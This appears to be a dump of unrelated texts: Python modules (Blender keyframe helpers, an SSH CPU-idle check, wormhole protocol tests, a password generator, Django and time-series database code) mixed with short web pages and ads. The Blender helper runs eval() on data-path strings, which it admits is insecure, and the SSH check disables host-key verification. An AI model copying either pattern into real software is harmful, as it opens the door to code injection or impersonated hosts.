import bpy
def get_full_data_path(bpy_obj):
return repr(bpy_obj)
def get_bpy_obj_from_data_path(data_path):
## TODO: this is hackish and insecure
return eval(data_path)
def get_active_strip(context=None):
if context is None:
context = bpy.context
return context.scene.sequence_editor.active_strip
def get_fcurve(scene, data_path):
action = scene.animation_data.action
if action is None:
return None
for fc in action.fcurves:
if fc.data_path == data_path:
return fc
def create_fcurve(scene, data_path, action_group=''):
action = scene.animation_data.action
if action is None:
return None
return action.fcurves.new(data_path, action_group=action_group)
def get_or_create_fcurve(scene, data_path, action_group=''):
fc = get_fcurve(scene, data_path)
if fc is not None:
return fc
return create_fcurve(scene, data_path, action_group)
def set_keyframe(fcurve, frame, value, interpolation='CONSTANT'):
kf = fcurve.keyframe_points.insert(frame, value)
kf.interpolation = interpolation
return kf
def get_keyframe(fcurve, *frames):
if len(frames) > 1:
keyframes = []
else:
keyframes = None
for kf in fcurve.keyframe_points:
if kf.co[0] in frames:
if keyframes is not None:
keyframes.append(kf)
else:
return kf
return keyframes
def iter_keyframes(**kwargs):
fcurves = kwargs.get('fcurves')
if fcurves is None:
scene = kwargs.get('scene')
action = scene.animation_data.action
fcurves = action.fcurves
for fc in fcurves:
for kf in fc.keyframe_points:
yield kf, fc
def get_keyframe_dict(**kwargs):
d = {}
for kf, fc in iter_keyframes(**kwargs):
frame = kf.co[0]  # kf.co is a (frame, value) pair; Keyframe itself is not subscriptable
if frame not in d:
d[frame] = {}
d[frame][fc.data_path] = {'keyframe':kf, 'fcurve':fc}
return d
class MultiCamContext:
@classmethod
def poll(cls, context):
if context.area.type != 'SEQUENCE_EDITOR':
return 0
active_strip = get_active_strip(context)
if active_strip is None:
return 0
if active_strip.type != 'MULTICAM':
return 0
return 1
def get_strip(self, context):
return get_active_strip(context)
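# Minimal usage sketch (hypothetical frame/value and strip name; assumes an
# active MULTICAM strip and that the scene already has an action):
#   strip = get_active_strip()
#   fc = get_or_create_fcurve(
#       bpy.context.scene,
#       'sequence_editor.sequences_all["%s"].multicam_source' % strip.name)
#   if fc is not None:
#       set_keyframe(fc, frame=1, value=strip.multicam_source)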
|
The upcoming graphic novel Dishonored: The Peeress and the Price will continue the events of the Dishonored series with its release on February 20.
Players most recently visited the world of Corvo Attano and Emily Kaldwin in 2016’s Dishonored 2 (and the series as a whole in last year’s Death of the Outsider). Luckily, those looking to engage with more of Arkane Studios’ world won’t have to wait much longer, thanks to a new graphic novel based on the series.
The novel is being written by comic writer Michael Moreci (Roche Limit), drawn by Andrea Olimpieri (Dishonored Volume 1, True Blood), and colored by Mattia Iacono (Dark Souls). |
from fabric.api import hide, run, env
import time
import json
def run_cmd(cmd):
with hide('output', 'running', 'warnings'):
return run(cmd, timeout=1200)
def check(**kwargs):
''' Login over SSH and execute shell command '''
jdata = kwargs['jdata']
logger = kwargs['logger']
env.gateway = jdata['data']['gateway']
env.host_string = jdata['data']['host_string']
env.user = jdata['data']['username']
env.key = jdata['data']['sshkey']
env.shell = "/bin/sh -c"
env.disable_known_hosts = True
env.warn_only = True
env.abort_on_prompts = True
results = run_cmd("uname -a")
if results.succeeded:
if "FreeBSD" in results:
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
cpu_idle = float(vmstat_info[-1])
else:
return None
else:
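# On typical Linux output, vmstat's CPU columns end with "id wa st",
# so idle is the third field from the end.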
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
cpu_idle = float(vmstat_info[-3])
else:
return None
else:
return None
threshold = float(jdata['data']['threshold'])
logger.debug("cpu-idle: Idle {0} Threshold {1}".format(cpu_idle, threshold))
if cpu_idle > threshold:
return True
else:
return False
|
Monte Carlo, Monaco – 15 April 2019 – Global luxury brand, Ralph & Russo, continues its retail expansion with its first European flagship opening within Monaco’s prestigious One-Monte Carlo complex, designed by award winning architect, Sir Richard Rogers, and situated in the heart of Monaco’s golden triangle. Home to leading luxury brands, the opening of the Monaco boutique closely follows the unveiling of the brand’s other flagships in Doha, Qatar and Dubai, UAE, with additional boutiques expected to launch globally in key destinations over the next year.
CEO, Michael Russo, comments: “Monaco is the ultimate luxury destination and home to the world’s leading designer brands. We are excited to be opening in such an international hub, which attracts residents and visitors from all over Europe and beyond”.
Measuring nearly 250 m² and set over two floors, the boutique is a testament to excellence in craftsmanship and architectural savoir faire, boasting an exquisite sculptural staircase at its core and an entirely bespoke interior, designed and personally defined by Creative Director, Tamara Ralph.
Ralph comments: “Monaco is such a special and prestigious region. It was so important to us that our Monte Carlo boutique not only reflected the brand, but also the grandeur of its location”.
Encased by 4,700 alternating metallic strips and illuminated by a breathtaking jeweled Murano glass chandelier, the staircase leads to a private lounge on the lower level, offering a unique client experience and orchestrating the perfect balance between visibility and privacy. The ground floor, in contrast, mirrors the feeling of Monaco with a more open atmosphere.
Enhanced by Nero Marquina and Carrara marble flooring, rose gold coiled brass furnishings and hues of silver grey, the boutique interiors reinterpret traditional yacht design, featuring elements of curvature throughout and offering an overall sensory experience. Ralph further comments: “The beauty of the Côte d’Azur and the yachts that inhabit it are so integral to the identity of Monaco. In designing the boutique I really wanted to celebrate the region’s maritime history alongside the contemporary splendour of the yachting community today”.
Home to a selection of the brand’s ready-to-wear, leather goods, accessories as well as a limited selection of exclusive couture pieces, the Ralph & Russo boutique is now open at One-Monte Carlo, Monaco. |
from __future__ import print_function, unicode_literals
import mock
from twisted.trial import unittest
from ..._dilation.connection import (parse_record, encode_record,
KCM, Ping, Pong, Open, Data, Close, Ack)
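# Wire format exercised by these tests (as inferred from the vectors below):
# each record starts with a one-byte type tag (0x00 KCM, 0x01 Ping, 0x02 Pong,
# 0x03 Open, 0x04 Data, 0x05 Close, 0x06 Ack). Ping/Pong carry a 4-byte
# ping_id; Open/Data/Close carry 4-byte big-endian scid and seqnum fields;
# Ack carries a 4-byte big-endian resp_seqnum; Data appends its payload
# after the header.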
class Parse(unittest.TestCase):
def test_parse(self):
self.assertEqual(parse_record(b"\x00"), KCM())
self.assertEqual(parse_record(b"\x01\x55\x44\x33\x22"),
Ping(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x02\x55\x44\x33\x22"),
Pong(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x03\x00\x00\x02\x01\x00\x00\x01\x00"),
Open(scid=513, seqnum=256))
self.assertEqual(parse_record(b"\x04\x00\x00\x02\x02\x00\x00\x01\x01dataaa"),
Data(scid=514, seqnum=257, data=b"dataaa"))
self.assertEqual(parse_record(b"\x05\x00\x00\x02\x03\x00\x00\x01\x02"),
Close(scid=515, seqnum=258))
self.assertEqual(parse_record(b"\x06\x00\x00\x01\x03"),
Ack(resp_seqnum=259))
with mock.patch("wormhole._dilation.connection.log.err") as le:
with self.assertRaises(ValueError):
parse_record(b"\x07unknown")
self.assertEqual(le.mock_calls,
[mock.call("received unknown message type: {}".format(
b"\x07unknown"))])
def test_encode(self):
self.assertEqual(encode_record(KCM()), b"\x00")
self.assertEqual(encode_record(Ping(ping_id=b"ping")), b"\x01ping")
self.assertEqual(encode_record(Pong(ping_id=b"pong")), b"\x02pong")
self.assertEqual(encode_record(Open(scid=65536, seqnum=16)),
b"\x03\x00\x01\x00\x00\x00\x00\x00\x10")
self.assertEqual(encode_record(Data(scid=65537, seqnum=17, data=b"dataaa")),
b"\x04\x00\x01\x00\x01\x00\x00\x00\x11dataaa")
self.assertEqual(encode_record(Close(scid=65538, seqnum=18)),
b"\x05\x00\x01\x00\x02\x00\x00\x00\x12")
self.assertEqual(encode_record(Ack(resp_seqnum=19)),
b"\x06\x00\x00\x00\x13")
with self.assertRaises(TypeError) as ar:
encode_record("not a record")
self.assertEqual(str(ar.exception), "not a record")
|
Over the last month or so Ebi-kun has had an annoying cough. It isn't a deep chesty cough; he sounds like he is continuously clearing his throat. So we have been going to the doctor and trying out various medications to figure out what it is. Last week I had to take him in every day to go on the nebuliser, and at the end of the week he ended up having a steroid IV.
The poor kid has been going to school but hasn't been sleeping well, so he was exhausted. The IV does appear to be working, and they also took blood to run tests to see if anything showed up.
We went back yesterday; my husband was back from Germany so we all went. Family outing to the doctor's, woo-hoo! The blood tests didn't show anything odd so the doc decided to give him another IV and some more syrup and tablets. Now, don't be alarmed at this photo, this is Ebi-kun doing his 'I am really poorly' face. I should get him on the TV, little actor!
I have to say, he is the perfect patient. Didn't even flinch when the nurse took blood and put the IV in, watched everything she was doing and even asked her questions. It reminded me of when he broke his arm, as soon as we went in to get an x-ray, he stopped crying and started asking the technician loads of questions about the x-ray machine. The poor technician was completely bemused!
So, now we wait and see. He has been sleeping better the last couple of nights; maybe the cooler weather has helped too. One funny thing did happen at the clinic. The doc speaks a bit of English, and I always make sure I speak slowly and try to use Japanese if I can. Yesterday, my husband was with us and the doc suddenly came out with perfect English, proper long sentences, not the basic sentences and odd words he had been using all week. I couldn't believe it! I still don't understand why he wasn't talking to us in Japanese, very amusing.
My boy had the same for a few weeks back in April when he started shougakko (elementary school). They thought that it could be asthma but in the end he was fine. I hope Ebi-kun gets well soon. |
#!/usr/bin/env python
# vim: fdm=marker
"""
pyssword - Password generator
Generates a random password with a specified entropy within specified character
sets. Uses /dev/urandom for random info by default.
Usage:
pyssword [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword --read [--lower --upper --numbers --symbols --entropy=bits --no-info --radix=radix --one-based]
pyssword --die=radix [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword passphrase [--entropy=bits --no-info]
pyssword passphrase --read [--entropy=bits --no-info --radix=radix --one-based]
pyssword passphrase --die=radix [--entropy=bits --no-info]
pyssword passphrase --info
pyssword --help
Options:
passphrase
Output a passphrase instead of a password. All characters are in
lowercase. This uses the EFF's long list, as described in
https://www.eff.org/deeplinks/2016/07/new-wordlists-random-passphrases
-e bits --entropy=bits
[Default: 128]
The entropy, in bits, of the password. This is a minimum value; the
final entropy may be a bit higher than specified due to rounding up to
an integral number of random inputs.
-l --lower
Use lowercase letters.
-u --upper
Use uppercase letters.
-n --numbers
Use numbers.
-s --symbols
Use symbols.
--info
Ask for a passphrase (a white-space separated list of words of the
current word list) from stdin. If connected to a terminal, the user
will be prompted to enter the passphrase. Any word not in the word
list will cause an error.
Outputs the passphrase info.
--no-info
Print only the password, without additional info.
-r --read
Ask for random information instead of relying on /dev/urandom. Numbers
are collected from stdin until enough entropy has been achieved. If
connected to a terminal, the user will be prompted to manually enter
random numbers.
Note: On platforms which have no /dev/urandom, this is the only way to
use the script.
You can use any source of random data. But keep in mind that in this
case the strength of the generated password is entirely dependent on
the random nature of the numbers provided. The best way to do so is to
use real, fair dice, and to actually throw them for getting random
input values. Also, numbers are not assumed to be given in base-10 by
default (see `--radix').
When connecting stdin to a pipe, there's the possibility of not enough
numbers being provided, in which case the script will just block
endlessly, waiting for input. Be sure to provide enough input in such
cases. For the math inclined, the minimum quantity of numbers needed
for a given radix and entropy (in bits) is:
total = round_up(entropy_bits / log(radix, 2))
Or you can just run the program without a pipe and wait for it to ask
you for numbers. The prompt has the actual quantity of expected
numbers. With this information, cancel it (Control-C) and try again
using a pipe.
--radix=radix
[Default: 256]
The radix used for random input numbers. Only used if `--read' is
given. Values range from 0 up to but excluding `radix' (see
`--one-based' for ranging values from 1 up to and including `radix').
-1 --one-based
Whether or not numbers are zero- or one-based. They are assumed to be
zero-based by default.
-d radix --die=radix
Treat input as a die with `radix' sides. Shortcut for `--read',
`--radix=radix' and `--one-based'.
-h --help
Show this.
Examples:
Without arguments, all characters are used to compute a password with the
default entropy (lowercase, uppercase, numbers and symbols):
$ pyssword --no-info
&I3`?)R0h0Co0H[>k)|\\
You can restrict the characters used and use a specific entropy:
$ pyssword --lower --numbers --entropy 64 --no-info
azs99hrimiov0g
By default, that is, without --no-info, additional information is shown:
$ pyssword --entropy 30
Actual entropy: 32.772944258388186
Set length: 94
Password: h+!:4
The full character set has 94 letters/numbers/symbols.
The source of random information can be changed. For using 16 bytes (that
is, 128 bits) from /dev/random do the following:
$ dd if=/dev/random bs=16 count=1 2>/dev/null | od -t u1 -A n -v | pyssword --read --no-info
)PN"GgyF%`#TdlI3IweV
Using real dice with six sides for generating a 26-bit passphrase:
$ pyssword passphrase --read --radix 6 --one-based --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using the shortcut option --die:
$ pyssword passphrase --die 6 --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using a pipe and without info:
$ cat - > /tmp/rolls
1 2 3 4 5 6 1 2 3 4 5
<Control-D>
$ cat /tmp/rolls | pyssword passphrase -d 6 -e 26 --no-info
abacus dispatch arousal
$ shred -u /tmp/rolls
Note: the three examples above returned three words, but the resulting
entropy is not 38.8 (each word in the Diceware list provides about 12.9 bits,
which is what you can get from a list with 7776 words). This happens
because in order to get at least 26 bits of entropy eleven die rolls are
needed, but then you'll get 28.4 bits. This value exceeds the entropy
provided by only two words (25.8 bits), and a third one is needed for
accounting for the difference and also to satisfy the requirement of at
least 26 bits. The entropy which exists is the same that gets in: no
entropy is created out of thin air, and the script makes its best efforts
to also not waste it.
"""
from math import ceil, log
import docopt
import itertools
import os
import pkg_resources
import random
import sys
WORDS = []
wordsfile = pkg_resources.resource_stream(
__name__,
'eff_large_wordlist.txt'
)
for wordline in wordsfile:
_base6index, word = wordline.rstrip().split(b'\t')
WORDS.append(word.decode('us-ascii'))
FULL = [chr(v) for v in range(33, 127)]
UPPER = [chr(v) for v in range(65, 65 + 26)]
LOWER = [chr(v) for v in range(97, 97 + 26)]
NUMBERS = [chr(v) for v in range(48, 48 + 10)]
SYMBOLS = list(set(FULL) - set(NUMBERS) - set(UPPER) - set(LOWER))
class IntOption:
def __init__(self, args, option):
self.option = option
try:
self.value = int(args[option])
except ValueError:
error("{} is not a valid integer".format(option))
def get(self):
return self.value
def greater_than(self, min):
if self.value <= min:
error("{} must be greater than {}".format(self.option, min))
return self
def less_than(self, max):
if self.value >= max:
error("{} must be less than {}".format(self.option, max))
return self
class Number:
def __init__(self, radix, digits):
assert radix > 1
for digit in digits:
assert 0 <= digit < radix
self._radix = radix
self._digits = digits
self.max_within_length = radix**len(digits)
self.bits = log(self.max_within_length, 2)
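# Example of the base conversion below (a sketch): Number(6, [1, 2, 3])
# holds the value 1*36 + 2*6 + 3 == 51; converting to radix 2 zero-pads to
# minlength == ceil(log(6**3, 2)) == 8 digits, giving [0, 0, 1, 1, 0, 0, 1, 1].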
def convert(self, radix):
n = 0
exp = 0
minlength = ceil(log(self.max_within_length, radix))
for digit in reversed(self._digits):
n += digit * (self._radix**exp)
exp += 1
if n == 0:
digits = [0]
else:
digits = []
while n:
r = n % radix
n = n // radix
digits.append(r)
padding = [0] * max(minlength - len(digits), 0)
return self.__class__(radix, padding + list(reversed(digits)))
def __iter__(self):
return iter(self._digits)
class TokenSet(tuple):
def __new__(cls, tokens):
if len(tokens) < 2:
error("Not enough tokens to choose from. Use a longer set.")
return tuple.__new__(cls, tokens)
@property
def bits(self):
return log(len(self), 2)
def select(self, number):
return [self[i] for i in number.convert(len(self))]
class Password:
def __init__(self, tokenset, number, separator):
self.set = tokenset
self.entropy = number.bits
self.value = tokenset.select(number)
self.separator = separator
def __str__(self):
return self.separator.join(self.value)
def error(message):
print(message)
sys.exit(1)
def run(args):
is_passphrase = args['passphrase']
if is_passphrase:
tokens = WORDS
else:
tokens = []
tokens.extend(args['--lower'] and LOWER or [])
tokens.extend(args['--upper'] and UPPER or [])
tokens.extend(args['--numbers'] and NUMBERS or [])
tokens.extend(args['--symbols'] and SYMBOLS or [])
tokens = tokens if len(tokens) else FULL
assert len(tokens) == len(set(tokens))
tokenset = TokenSet(tokens)
if args['--die']:
args['--read'] = True
args['--radix'] = args['--die']
args['--one-based'] = True
if args['--info']:
radix = len(tokens)
generator, entropy = read_words(tokens)
else:
entropy = IntOption(args, '--entropy').greater_than(0).get()
if args['--read']:
radix = IntOption(args, '--radix').greater_than(1).get()
generator = user_generator(entropy, radix, args['--one-based'])
else:
rng = random.SystemRandom()
radix = len(tokens)
generator = random_generator(rng, radix)
total = ceil(entropy / log(radix, 2))
inputs = list(itertools.islice(source(generator), total))
number = Number(radix, inputs)
pw = Password(tokenset, number, ' ' if is_passphrase else '')
if args['--no-info']:
print(pw)
else:
print("Actual entropy: {}\n"
"Set length: {}\n"
"Password: {}"
"".format(pw.entropy, len(pw.set), pw))
def random_generator(rng, radix):
while True:
yield rng.randrange(radix)
def user_generator(desired_entropy, radix, onebased):
total = ceil(desired_entropy / log(radix, 2))
promptsize = 2 * len(str(total)) + len('/')
count = 0
offset = -1 if onebased else 0
def readline(line):
values = line.strip().split(' ')
try:
values = [int(value) + offset for value in values if value]
except ValueError:
values = []
yield from (v for v in values if 0 <= v < radix)
while True:
if sys.stdin.isatty():
prompt = '{}/{}'.format(count + 1, total)
print(prompt.rjust(promptsize), end=': ')
sys.stdout.flush()
for value in readline(sys.stdin.readline()):
count += 1
yield value
def read_words(tokens):
if sys.stdin.isatty():
print('Enter words separated by space', end=': ')
sys.stdout.flush()
values = []
for word in sys.stdin.readline().strip().split(' '):
try:
values.append(tokens.index(word))
except ValueError:
error("{} is not part of the word list.".format(word))
return (values, log(len(tokens)**len(values), 2))
def source(*inputs):
return itertools.chain(*[iter(input) for input in inputs])
def main():
try:
return run(docopt.docopt(__doc__))
except KeyboardInterrupt:
return 1
if __name__ == '__main__':
sys.exit(main())
|
Lamar University's bachelor's degree in communication with an emphasis in broadcasting offers you valuable hands-on experience fresh out of high school, an opportunity most students elsewhere would love to have!
Our program is designed to give you a strong foundation and even stronger experience. You'll take courses in digital editing, audio production, TV writing and performing and television field production, among others.
We strongly encourage participation in Lamar University Television (LUTV) and KVLU Public Radio. Our graduates have worked at CBS, ESPN, CNN, BET, and Disney, and often work in key positions.
LUTV on Fox production featuring an interview with outgoing Lamar president James M. "Jimmy" Simmons.
Evan West conducts an in-depth interview with Bill Macatee, Lamar alumnus and CBS sports anchor.
Download the broadcasting track degree plan. |
##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2017 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from ckeditor.fields import RichTextField
from django.conf import settings
from django.db import models
from django.db.models import F
from django.utils.translation import gettext_lazy as _
from ordered_model.admin import OrderedModelAdmin
from ordered_model.models import OrderedModel
class AbstractEducationGroupAchievementAdmin(OrderedModelAdmin):
list_display = ('code_name', 'order', 'move_up_down_links')
readonly_fields = ['order']
search_fields = ['code_name', 'order']
class AbstractEducationGroupAchievementQuerySet(models.QuerySet):
def annotate_text(self, language_code):
return self.annotate(
text=F('french_text') if language_code == settings.LANGUAGE_CODE_FR else F('english_text')
)
class AbstractEducationGroupAchievement(OrderedModel):
external_id = models.CharField(max_length=100, blank=True, null=True, db_index=True)
changed = models.DateTimeField(null=True, auto_now=True)
code_name = models.CharField(max_length=100, verbose_name=_('code'))
english_text = RichTextField(null=True, verbose_name=_('text in English'))
french_text = RichTextField(null=True, verbose_name=_('text in French'))
class Meta:
abstract = True
objects = AbstractEducationGroupAchievementQuerySet.as_manager()
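# Minimal usage sketch (hypothetical concrete subclass; the 'fr-be' language
# code is illustrative and assumes settings.LANGUAGE_CODE_FR is defined, as
# referenced above):
#   class EducationGroupAchievement(AbstractEducationGroupAchievement):
#       pass
#   for achievement in EducationGroupAchievement.objects.annotate_text('fr-be'):
#       print(achievement.code_name, achievement.text)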
|
Go Birds! Beautiful Hand Stamped Solid Pewter with "Fly Eagles Fly". Includes Hand Wrapped Green and Black Swarovski Crystals and Football and Wing Charm. Expandable Bangle is Solid Stainless Steel and never tarnishes. All jump rings are stainless steel and also never tarnish. Charms are lead free and nickel free. Comes with gorgeous gift box. Order today while the season is hot! |
#!/usr/bin/env python3
from tsdb import TSDBServer
from tsdb.persistentdb import PersistentDB
import timeseries as ts
import tkinter as tk
identity = lambda x: x
schema = {
'pk': {'convert': identity, 'index': None,'type':str}, #will be indexed anyways
'ts': {'convert': identity, 'index': None},
'order': {'convert': int, 'index': 1,'type':int},
'blarg': {'convert': int, 'index': 1,'type' : int},
'useless': {'convert': identity, 'index': None, 'type' : str},
'mean': {'convert': float, 'index': 1,'type' : float},
'std': {'convert': float, 'index': 1, 'type' : float},
'vp': {'convert': bool, 'index': 1, 'type' : bool}
}
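# Each schema entry maps a field name to: 'convert', the callable applied to
# incoming values; 'index', where None means the field is not indexed; and
# 'type', the Python type stored for the field (as used by PersistentDB).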
#schema = {
# 'pk': {'convert': identity, 'index': None, 'type':str}, #will be indexed anyways
# 'ts': {'convert': identity, 'index': None},
#}
NUMVPS = 5
def main(load=False, dbname="db", overwrite=False, threshold = 10, wordlength = 16, tslen = 256, cardinality = 64):
# we augment the schema by adding columns for 5 vantage points
#for i in range(NUMVPS):
# schema["d_vp-{}".format(i)] = {'convert': float, 'index': 1}
db = PersistentDB(schema, 'pk',load=load, dbname=dbname, overwrite=overwrite, threshold = threshold, wordlength = wordlength, tslen = tslen, cardinality = cardinality)
server = TSDBServer(db)
server.run()
if __name__=='__main__':
class SampleApp(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
self.destroy()
self.master = tk.Tk()
self.master2 = None
self.label = tk.Label(self.master,text="""
This is a brief introduction to the similarity search for time series
using the iSAX index.
In the next window you will be asked to input some values. The first
determines whether or not to load the database from an existing database.
You will next be asked to provide a database name for loading or writing.
Next, whether to overwrite the existing database, in the event that one of
the given name exists. You will further be asked to give the cardinality of
the iSAX representation to be used, which is essentially the number of vertical
slices into which you wish the time series to be divided for indexing.
Cardinalities greater than 64 are not supported at the moment. The next
value is a threshold, the number of time series to hold in a leaf node. Then the
word length, so the number of segments or horizontal slices for indexing the
time series. Finally, please provide the time series length, which is the number
of data points you wish your time series to be interpolated to for uniformization
of the time series. These interpolation points will be evenly spaced between the
maximum and minimum time values, including the endpoints. If no values are input
defaults will be used. Defaults are indicated by [...].
""",justify = 'left')
self.button = tk.Button(self.master, text="continue", command=self.on_button)
self.label.pack()
self.button.pack()
def on_button(self):
if self.master2:
self.master2.destroy()
else:
self.master.destroy()
self.card = 64
self.dbn = "db"
self.th = 10
self.wl = 8
self.tslen = 256
self.master1 = tk.Tk()
self.label2 = tk.Label(self.master1,text="Load (true or false) [False]: ")
self.entry2 = tk.Entry(self.master1)
self.label3 = tk.Label(self.master1,text="Database name (no spaces) [db]: ")
self.entry3 = tk.Entry(self.master1)
self.label4 = tk.Label(self.master1,text="Overwrite (true or false) [False]: ")
self.entry4 = tk.Entry(self.master1)
self.label1 = tk.Label(self.master1,text="Cardinality (must be a power of 2) [64]: ")
self.entry1 = tk.Entry(self.master1)
self.label5 = tk.Label(self.master1,text="Threshold (must be a positive integer) [10]: ")
self.entry5 = tk.Entry(self.master1)
self.label6 = tk.Label(self.master1,text="Word length (must be a power of 2) [8]: ")
self.entry6 = tk.Entry(self.master1)
self.label7 = tk.Label(self.master1,text="Time series length (must be a power of 2) [256]: ")
self.entry7 = tk.Entry(self.master1)
self.button = tk.Button(self.master1, text="continue", command=self.on_button1)
self.label2.pack()
self.entry2.pack()
self.label3.pack()
self.entry3.pack()
self.label4.pack()
self.entry4.pack()
self.label1.pack()
self.entry1.pack()
self.label5.pack()
self.entry5.pack()
self.label6.pack()
self.entry6.pack()
self.label7.pack()
self.entry7.pack()
self.button.pack()
def on_button1(self):
self.master2 = tk.Tk()
card = self.entry1.get()
if card:
try:
self.card = int(card)
except ValueError:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the cardinality.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.ld = self.entry2.get()
if self.ld:
if self.ld[0].lower() == 't':
self.ld = True
else:
self.ld = False
else:
self.ld = False
dbn = self.entry3.get()
if dbn:
self.dbn = dbn
self.ovrw = self.entry4.get()
if self.ovrw:
if self.ovrw[0].lower() == 't':
self.ovrw = True
else:
self.ovrw = False
else:
self.ovrw = False
th = self.entry5.get()
wl = self.entry6.get()
tslen = self.entry7.get()
if th:
try:
self.th = int(th)
except ValueError:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the threshold.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if wl:
try:
self.wl = int(wl)
except ValueError:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the word length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if tslen:
try:
self.tslen = int(tslen)
except ValueError:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the time series length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.label_1 = tk.Label(self.master2,text="Is the following correct?\n\nLoad: "+str(self.ld)+'\n\nDatabase name: '+str(self.dbn)+'\n\nOverwrite: '+str(self.ovrw)+'\n\nCardinality: '+str(self.card)+'\n\nThreshold: '+str(self.th)+'\n\nWord length: '+str(self.wl)+'\n\nTime series length: '+str(self.tslen)+'\n\n',justify = 'left')
self.button1 = tk.Button(self.master2, text="yes", command=self.on_button2)
self.button2 = tk.Button(self.master2, text="no", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack(side='right')
self.button2.pack(side='right')
def on_button2(self):
self.master2.destroy()
main(load=self.ld, dbname=self.dbn, overwrite=self.ovrw, threshold = self.th, wordlength = self.wl, tslen = self.tslen, cardinality = self.card)
app = SampleApp()
app.mainloop()
|
Saratoga Springs: Are You On Team Yanny Or Team Laurel?
Weigh in on the latest meme to break the internet.
If you’re on social media all day long—it’s part of my job, so I have a good excuse—you tend to see quite a few memes go viral. Whether it be hashtag games on Twitter or image-based creations on Facebook, memes are a fun distraction during a grueling work day. Like that multi-colored dress that broke the internet in 2015. Man, I spent way too much time trying to figure that one out. It broke my brain.
But when I just listened to the clip above, all I could hear was “Laurel.” I’m now afraid that I’ve gone completely insane. Or that there are two different recordings out there, and I just fell for another piece of fake (audio) news. CNN believes it has scientific proof of which answer is the correct one. Please help me make up my mind once and for all, Saratoga! |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.simulation.base.networks import SynapticTrigger
from morphforge.simulation.base.networks import PreSynapticTypes
from morphforge.traces.eventset import EventSet
class SynapticTriggerByVoltageThreshold(SynapticTrigger):
def __init__(self, cell_location, voltage_threshold, delay, **kwargs):
super(SynapticTriggerByVoltageThreshold, self).__init__(**kwargs)
self.cell_location = cell_location
self.voltage_threshold = voltage_threshold
self.delay = delay
def get_presynaptic_cell_location(self):
return self.cell_location
def get_presynaptic_cell(self):
return self.cell_location.cell
def get_type(self):
return PreSynapticTypes.Cell
def get_summary_string(self):
return '%s: [threshold: %s]'%( self.cell_location.get_location_description_str(), self.voltage_threshold )
class SynapticTriggerAtTimes(SynapticTrigger):
def __init__(self, time_list, **kwargs):
super(SynapticTriggerAtTimes, self).__init__(**kwargs)
# Convert into an event set
if not isinstance(time_list, EventSet):
time_list = EventSet(time_list)
self.time_list = time_list
def get_presynaptic_cell(self):
return None
def get_type(self):
return PreSynapticTypes.FixedTiming
def get_summary_string(self):
return 'At times: %s (ms)'%( self.time_list.times_in_np_array_ms() )
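# Usage sketch (hypothetical times, in ms; in a real morphforge setup both
# trigger types are wired into a larger simulation rather than used standalone,
# and EventSet construction may expect unit-tagged times):
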